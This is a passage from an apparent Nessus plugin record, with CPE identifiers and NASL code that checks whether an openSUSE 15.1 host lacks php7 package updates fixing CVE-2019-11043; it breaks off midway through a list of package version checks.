"p-cpe:/a:novell:opensuse:php7-gettext", "p-cpe:/a:novell:opensuse:php7-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php7-gmp", "p-cpe:/a:novell:opensuse:php7-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php7-iconv", "p-cpe:/a:novell:opensuse:php7-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php7-intl", "p-cpe:/a:novell:opensuse:php7-intl-debuginfo", "p-cpe:/a:novell:opensuse:php7-json", "p-cpe:/a:novell:opensuse:php7-json-debuginfo", "p-cpe:/a:novell:opensuse:php7-ldap", "p-cpe:/a:novell:opensuse:php7-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php7-mbstring", "p-cpe:/a:novell:opensuse:php7-mbstring-debuginfo", "p-cpe:/a:novell:opensuse:php7-mysql", "p-cpe:/a:novell:opensuse:php7-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php7-odbc", "p-cpe:/a:novell:opensuse:php7-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php7-opcache", "p-cpe:/a:novell:opensuse:php7-opcache-debuginfo", "p-cpe:/a:novell:opensuse:php7-openssl", "p-cpe:/a:novell:opensuse:php7-openssl-debuginfo", "p-cpe:/a:novell:opensuse:php7-pcntl", "p-cpe:/a:novell:opensuse:php7-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php7-pdo", "p-cpe:/a:novell:opensuse:php7-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php7-pear", "p-cpe:/a:novell:opensuse:php7-pear-archive_tar", "p-cpe:/a:novell:opensuse:php7-pgsql", "p-cpe:/a:novell:opensuse:php7-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php7-phar", "p-cpe:/a:novell:opensuse:php7-phar-debuginfo", "p-cpe:/a:novell:opensuse:php7-posix", "p-cpe:/a:novell:opensuse:php7-posix-debuginfo", "p-cpe:/a:novell:opensuse:php7-readline", "p-cpe:/a:novell:opensuse:php7-readline-debuginfo", "p-cpe:/a:novell:opensuse:php7-shmop", "p-cpe:/a:novell:opensuse:php7-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php7-snmp", "p-cpe:/a:novell:opensuse:php7-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php7-soap", "p-cpe:/a:novell:opensuse:php7-soap-debuginfo", "p-cpe:/a:novell:opensuse:php7-sockets", "p-cpe:/a:novell:opensuse:php7-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php7-sodium", "p-cpe:/a:novell:opensuse:php7-sodium-debuginfo", "p-cpe:/a:novell:opensuse:php7-sqlite", "p-cpe:/a:novell:opensuse:php7-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvmsg", "p-cpe:/a:novell:opensuse:php7-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvsem", "p-cpe:/a:novell:opensuse:php7-sysvsem-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvshm", "p-cpe:/a:novell:opensuse:php7-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php7-test", "p-cpe:/a:novell:opensuse:php7-tidy", "p-cpe:/a:novell:opensuse:php7-tidy-debuginfo", "p-cpe:/a:novell:opensuse:php7-tokenizer", "p-cpe:/a:novell:opensuse:php7-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php7-wddx", "p-cpe:/a:novell:opensuse:php7-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php7-xmlreader", "p-cpe:/a:novell:opensuse:php7-xmlreader-debuginfo", "p-cpe:/a:novell:opensuse:php7-xmlrpc", "p-cpe:/a:novell:opensuse:php7-xmlrpc-debuginfo", "p-cpe:/a:novell:opensuse:php7-xmlwriter", "p-cpe:/a:novell:opensuse:php7-xmlwriter-debuginfo", "p-cpe:/a:novell:opensuse:php7-xsl", "p-cpe:/a:novell:opensuse:php7-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php7-zip", "p-cpe:/a:novell:opensuse:php7-zip-debuginfo", "p-cpe:/a:novell:opensuse:php7-zlib", "p-cpe:/a:novell:opensuse:php7-zlib-debuginfo", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2441.NASL", "href": "https://www.tenable.com/plugins/nessus/130580", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2441.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130580);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"openSUSE Security Update : php7 (openSUSE-2019-2441)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for php7 fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2019-11043: Fixed possible remote code execution via\n env_path_info underflow in fpm_main.c (bsc#1154999).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1154999\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php7 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-embed-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pear-Archive_Tar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sodium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sodium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-mod_php7-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-mod_php7-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-bcmath-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-bcmath-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-bz2-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-bz2-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-calendar-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-calendar-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-ctype-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-ctype-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-curl-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-curl-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-dba-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-dba-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-debugsource-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-devel-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-dom-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-dom-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-embed-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-embed-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-enchant-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-enchant-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-exif-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-exif-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-fastcgi-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-fastcgi-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-fileinfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-fileinfo-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-firebird-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-firebird-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-fpm-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-fpm-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-ftp-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-ftp-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-gd-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-gd-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-gettext-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-gettext-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-gmp-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-gmp-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-iconv-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-iconv-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-intl-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-intl-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-json-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-json-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-ldap-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-ldap-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-mbstring-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-mbstring-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-mysql-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-mysql-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-odbc-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-odbc-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-opcache-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-opcache-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-openssl-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-openssl-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-pcntl-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-pcntl-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-pdo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-pdo-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-pear-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-pear-Archive_Tar-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-pgsql-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-pgsql-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-phar-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-phar-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-posix-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-posix-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-readline-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-readline-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-shmop-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-shmop-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-snmp-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-snmp-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-soap-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-soap-debuginfo-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"php7-sockets-7.2.5-lp151.6.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", 